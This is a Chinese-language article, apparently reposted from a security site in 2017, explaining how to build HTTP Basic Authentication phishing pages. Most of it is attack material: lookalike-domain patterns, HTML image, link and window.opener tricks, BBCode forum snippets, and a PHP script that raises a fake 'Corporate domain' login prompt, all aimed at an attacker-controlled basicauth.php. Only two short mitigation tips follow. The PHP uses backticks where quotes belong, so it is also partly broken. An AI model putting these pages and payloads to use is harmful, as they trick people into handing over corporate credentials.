如何製作基礎認證釣魚頁面?
本文講的是如何製作基礎認證釣魚頁面?,
targetdomain.co/.net target-domain.com targetdomain-oauth.com targetdomain-cdn.com targetdomain-images.com login-targetdomain.com
網路代理身份驗證要求; 長時間的沒有操作而退出登入,如要再操作還需再次登入。
<html> <body> Just a funny cat image <img src="http://target-domain.com/basicauth.php" alt="Could not load image - Invalid credentils."/> </body> </html>
<?php $valid_passwords = array ("security" => "cafe"); $valid_users = array_keys($valid_passwords); $user = isset($_SERVER[`PHP_AUTH_USER`]) ? $_SERVER[`PHP_AUTH_USER`] : ""; $pass = isset($_SERVER[`PHP_AUTH_PW`]) ? $_SERVER[`PHP_AUTH_PW`] : ""; $validated = (in_array($user, $valid_users)) && ($pass == $valid_passwords[$user]); if (!$validated) { header(`WWW-Authenticate: Basic realm="Corporate domain"`); //header(`HTTP/1.0 401 Unauthorized`); die ("Not authorized"); } // If the user enters valid credentials, just show him a cat picture header("Location: https://kpmgsecurity.files.wordpress.com/2017/06/cat.jpg") ?>
<html> <body> A cool website you should visit: <a href="http://target-domain.com/basicauth.php">Click me!</a> </body> </html>
<html> <body> Another cool website you should visit: <a href="http://target-domain.com/landingpage.html" target="_blank">Click me!</a> </body> </html>
<html> <head> <title>Nothing here</title> </head> <body> <script> window.opener.location="http://target-domain.com/basicauth.php"; </script> </body> </html>
[img]http://target-domain.com/basicauth.php[/img] <img>http://target-domain.com/basicauth.php</img> [a]http://target-domain.com/basicauth.php[/a] [url]http://target-domain.com/basicauth.php[/url] ... and many more examples
1.不允許使用者到你的網站去新增影像和連結; 2.可以過濾不需要的基本身份驗證提示,將所有外部資源與本地URL進行封裝(類似於Facebook的URL封裝)。 雖然第一個建議可能會超出許多網站的安全防護目的,但第二個建議可能很難在定製平臺上實現和維護。
原文釋出時間為:2017年9月12日
本文作者:xiaohui
本文來自雲棲社群合作伙伴嘶吼,瞭解相關資訊可以關注嘶吼網站。
相關文章
- Web頁面製作基礎Web
- 雙因素認證繞過的釣魚工具
- 釣魚篇-其他釣魚
- 如何製作H5頁面?分享簡單實用H5頁面製作教程H5
- 釣魚篇-郵件釣魚
- 釣魚篇-網路釣魚
- 設定頁面認證(轉)
- 零基礎創作專業wordpress網站10-製作聯絡頁面網站
- 零基礎創作專業wordpress網站09-製作服務頁面網站
- 零基礎創作專業wordpress網站08-製作關於頁面網站
- 釣魚篇-其他型別釣魚型別
- SSL認證失敗,製作證書
- 【釣魚】與【反釣魚】的技術剖析
- 如何防範釣魚網站詐騙?網站
- 釣魚攻擊防不勝防,該如何預防網路釣魚攻擊?
- HTTP基礎認證Basic AuthenticationHTTP
- 釣魚學習
- WebApi身份認證解決方案(1):Basic基礎認證WebAPI
- 網站404頁面怎麼做 404頁面製作步驟網站
- 基礎認證偽造工具phishery
- 零基礎如何製作易語言網路驗證註冊碼系統?
- Android UI基礎 仿閒魚釋出頁AndroidUI
- 網路釣魚 你知道如何識別嗎?
- 零基礎創作專業wordpress網站11-製作頁尾(Footer)網站
- 釣魚網站與反釣魚技術剖析(圓桌會議)網站
- Django基礎八之認證模組---authDjango
- C1 能力認證——JS基礎JS
- android使用html+javascript來製作頁面AndroidHTMLJavaScript
- 自己如何製作一個網頁網頁
- 如何使用 vue + typescript 編寫頁面 ( 基礎裝飾器部分 )VueTypeScript
- 釣魚?這是反代理!
- 網路釣魚攻擊
- 315曝光釣魚WiFi如何不做那條上鉤的魚?WiFi
- 網路釣魚是什麼?網路釣魚攻擊的形式有哪些?
- 美團被爆用釣魚郵件獲拼多多薪資資訊,電商企業如何防範釣魚郵件?
- Solidworks 如何複製 基準面Solid
- 零基礎創作專業wordpress網站06-製作主頁(elementor)網站
- 釣魚郵件盯上iPhone,釣魚垃圾郵件又一個傳送高潮薦iPhone